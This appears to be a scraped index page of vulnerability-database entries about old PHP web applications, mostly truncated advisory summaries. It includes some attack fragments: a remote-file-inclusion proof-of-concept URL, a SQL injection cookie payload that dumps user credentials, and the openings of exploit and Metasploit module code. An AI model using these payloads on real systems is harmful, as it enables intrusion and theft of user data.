PeopleAggregator <= 1.2pre6-release-53 Multiple RFI Vulnerabilities

No description provided by source. PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-53.tar.gz DORK : copyright 2006 Broadband Mechanics POC : /web/Flickrclient.php?pathprefix=shell...

Simple E-Document upload Remote Code Execution

A remote code execution vulnerability has been found in Simple E-Document. The vulnerability is due to the access cookie which could be abused to bypass authentication. A remote attacker can exploit this weakness to upload malicious PHP files which could result in arbitrary code execution in the...

Joomla Media Manager File Upload Code Execution (CVE-2013-5576)

A remote code execution vulnerability has been found in Joomla Media Manager. The vulnerability is due to the Joomla Media Manager component allowing arbitrary file uploads, and results in arbitrary code execution. A remote attacker can exploit this weakness to upload malicious PHP files which...

CUUMALL 注入 5-8

简要描述： 来了个新厂商。 挖一下把。 开放+封闭源代码 封闭源代码，普通用户使用加密后的代码，付费用户使用开放的源代码，使商城更安全 对于我这种屌丝只能用免费版 就是zend后的代码。 不过还是有几个文件没zend。 就只看这几个文件了。 详细说明： 第五处 kuaiqian/receivemall.php中 $dealTime=trim$REQUEST'dealTime'; //获取实际支付金额 ///单位为分 ///比方 2 ，代表0.02元 $payAmount=trim$REQUEST'payAmount'; //获取交易手续费 ///单位为分 ///比方 2 ，代表0.02元...

No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key

Exploit for php platform in category web applications ?php / Static encryptionkey of No-CMS lead to Session Array Injection in order to hijack administrator account then you will be able for upload php files to server via theme/module upload. This exploit generates cookie for administrator access...

No-CMS 0.6.6 Rev 1 Account Hijack / Remote Command Execution

mcryptexists = functionexists'mcryptencrypt';...

Wim Fleischhauer Docpile INIT_PATH Parameter PHP Code Execution - Ver2 (CVE-2006-4076)

A code execution vulnerability has been reported in Wim Fleischhauer Docpile. An attacker could exploit this vulnerability via a URL in the INITPATH parameter to lib/access.inc.php, lib/folders.inc.php, lib/init.inc.php or lib/templates.inc.php. Successful exploitation of this vulnerability could...

Simple E-Document Arbitrary File Upload

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 "Simple E-Document Arbitrary File Upload", 'Description' = %q This module exploits a file upload vulnerability found in Simple...

BuxAlert PTC SQL Injection

Inject in cookiws usNick usNick=i-Hmx'/! union all select 1,select groupconcatusername,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E from tbusers,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 and 'faris'='1337 require'config.php'; $lole=$COOKIE"usNick"; $tabla = mysqlquery"SELECT FROM tbusers where...

Drupal 6.x < 6.29 Multiple Vulnerabilities

The remote web server is running a version of Drupal that is 6.x prior to 6.29. It is, therefore, potentially affected by multiple vulnerabilities : - An error exists related to the HTML form API and validation callbacks as used by third-party modules that could allow an attacker to bypass the...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in the WP Ultimate Email Marketer plugin 1.1.0 and possibly earlier for Wordpress allow remote attackers to inject arbitrary web script or HTML via the 1 siteurl parameter to campaign/campaignone.php; the 2 action, 3 campaignname, 4 campaignformat...

WordPress Magnitudo theme Arbitrary File Upload Vulnerability

Exploit for php platform in category web applications 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 +...

FlashChat Arbitrary File Upload

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "FlashChat Arbitra...

WPtouch / WPtouch Pro XSS / Path Disclosure Vulnerabilities

WPtouch and WPtouch Pro suffer from cross site scripting and path disclosure vulnerabilities. I want to inform you about vulnerabilities in WPtouch and WPtouch Pro plugins for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in...

Exponent CMS Multiple Vulnerabilities

Exponent CMS is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2013 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:exponentcms:exponentcms";...

CVE-2013-1468

Cross-site request forgery CSRF vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

CVE-2013-1468

Cross-site request forgery CSRF vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

Cross site request forgery (csrf)

Cross-site request forgery CSRF vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

CVE-2013-1468

Cross-site request forgery CSRF vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

CVE-2013-1468

CVE-2013-1468: Piwigo LocalFiles Editor plugin contains a CSRF vulnerability (pre-2.4.7) that enables an attacker to hijack administrator authentication and cause creation of arbitrary PHP files via unspecified vectors. Public details in the NVD description confirm the CSRF flaw with impact on in...